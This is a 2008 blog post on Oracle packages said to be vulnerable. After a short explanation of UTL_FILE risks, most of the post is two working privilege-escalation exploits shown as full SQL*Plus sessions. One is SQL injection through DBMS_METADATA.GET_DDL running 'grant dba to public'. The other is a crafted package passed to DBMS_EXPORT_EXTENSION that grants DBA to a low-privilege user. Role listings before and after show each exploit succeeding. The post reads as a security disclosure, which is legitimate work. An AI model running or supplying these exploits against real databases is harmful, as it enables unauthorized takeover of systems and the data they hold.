Yaping's Weblog

September 2, 2008

Vulnerable Packages

Filed under: Oracle — Yaping @ 2:34 am
Tags:

I’ll list several vulnerable packages, which are used frequently.

Utl_file
Utl_file package can be used to read/write OS files within db, PUBLIC has execute privilege by default. If users have only create session privilege and read/write privilege on directories or utl_file_dir set, then these users can read/write any files under these directories which oracle have corresponding privilege. Cracker can read sensitive data or destroy whole database through it.

Dbms_metadata
Input passed to the OBJECT_TYPE parameter used in various procedures of the dbms_metadata package is not properly sanitised and can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Oracle 9i/10g has this issue.

@>conn test/test
Connected.
@>select * from session_roles;
ROLE
——————————
RESOURCE
CONNECT
PLUSTRACE

@>create or replace function get_dba
  2    return varchar2
  3    authid current_user is
  4    pragma autonomous_transaction;
  5    begin
  6      execute immediate ‘grant dba to public’;
  7      commit;
  8      return ”;
  9    end;
 10  /
Function created.

@>@>
@>select dbms_metadata.get_ddl(”’||test.get_dba()||”’,”) from dual;
ERROR:
ORA-31600: invalid input value ‘||test.get_dba()||’ for parameter OBJECT_TYPE in function GET_DDL
ORA-06512: at “SYS.DBMS_SYS_ERROR”, line 105
ORA-06512: at “SYS.DBMS_METADATA_INT”, line 1536
ORA-06512: at “SYS.DBMS_METADATA_INT”, line 1900
ORA-06512: at “SYS.DBMS_METADATA_INT”, line 3606
ORA-06512: at “SYS.DBMS_METADATA”, line 504
ORA-06512: at “SYS.DBMS_METADATA”, line 560
ORA-06512: at “SYS.DBMS_METADATA”, line 1221
ORA-06512: at line 1
no rows selected

@>conn test/test
Connected.
@>select * from session_roles;
ROLE
——————————
DBA
SELECT_CATALOG_ROLE
HS_ADMIN_ROLE
EXECUTE_CATALOG_ROLE
DELETE_CATALOG_ROLE
EXP_FULL_DATABASE
IMP_FULL_DATABASE
GATHER_SYSTEM_STATISTICS
PLUSTRACE
RESOURCE
CONNECT
11 rows selected.

DBMS_EXPORT_EXTENSION
This package is used when export data, PUBLIC has execute privilege by default before 10gR2.

@>conn test/test
Connected.
@>
@>select * from session_roles;
ROLE
——————————
RESOURCE
CONNECT
PLUSTRACE

@>CREATE OR REPLACE PACKAGE MYTESTPKG
  2  AUTHID CURRENT_USER
  3  IS
  4    FUNCTION ODCIIndexGetMetadata(oindexinfo SYS.odciindexinfo,P3 VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
  5    RETURN NUMBER;
  6  END;
  7  /
Package created.

@>CREATE OR REPLACE PACKAGE BODY MYTESTPKG
  2  IS
  3    FUNCTION ODCIIndexGetMetadata(oindexinfo SYS.odciindexinfo,P3 VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
  4    RETURN NUMBER
  5  IS
  6    pragma autonomous_transaction;
  7  BEGIN
  8    EXECUTE IMMEDIATE ‘GRANT DBA TO TEST’;
  9    COMMIT;
 10    RETURN(1);
 11  END;
 12
 13  END;
 14  /
Package body created.

@>DECLARE
  2    V_INDEX_NAME VARCHAR2(200);
  3    V_INDEX_SCHEMA VARCHAR2(200);
  4    V_TYPE_NAME VARCHAR2(200);
  5    V_TYPE_SCHEMA VARCHAR2(200);
  6    V_VERSION VARCHAR2(200);
  7    V_NEWBLOCK PLS_INTEGER;
  8    V_GMFLAGS NUMBER;
  9    v_Return VARCHAR2(200);
 10  BEGIN
 11    V_INDEX_NAME := ‘A1′;
 12    V_INDEX_SCHEMA := ‘TEST’;
 13    V_TYPE_NAME := ‘MYTESTPKG’;
 14    V_TYPE_SCHEMA := ‘TEST’;
 15    V_VERSION := ‘9.2.0.4.0′;
 16    V_GMFLAGS := 1;
 17
 18    v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(INDEX_NAME => V_INDEX_NAME, INDEX_SCHEMA => V_INDEX_SCHEMA,
 19              TYPE_NAME=> V_TYPE_NAME,TYPE_SCHEMA => V_TYPE_SCHEMA, VERSION => V_VERSION, NEWBLOCK =>V_NEWBLOCK, GMFLAGS => V_GMFLAGS);
 20  END;
 21  /
PL/SQL procedure successfully completed.

@>set role dba;
Role set.
@>select * from session_roles;
ROLE
——————————
DBA
SELECT_CATALOG_ROLE
HS_ADMIN_ROLE
EXECUTE_CATALOG_ROLE
DELETE_CATALOG_ROLE
EXP_FULL_DATABASE
IMP_FULL_DATABASE
GATHER_SYSTEM_STATISTICS
PLUSTRACE
9 rows selected.

Advertisements

Leave a Comment »

No comments yet.

RSS feed for comments on this post. TrackBack URI

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Create a free website or blog at WordPress.com.

%d bloggers like this: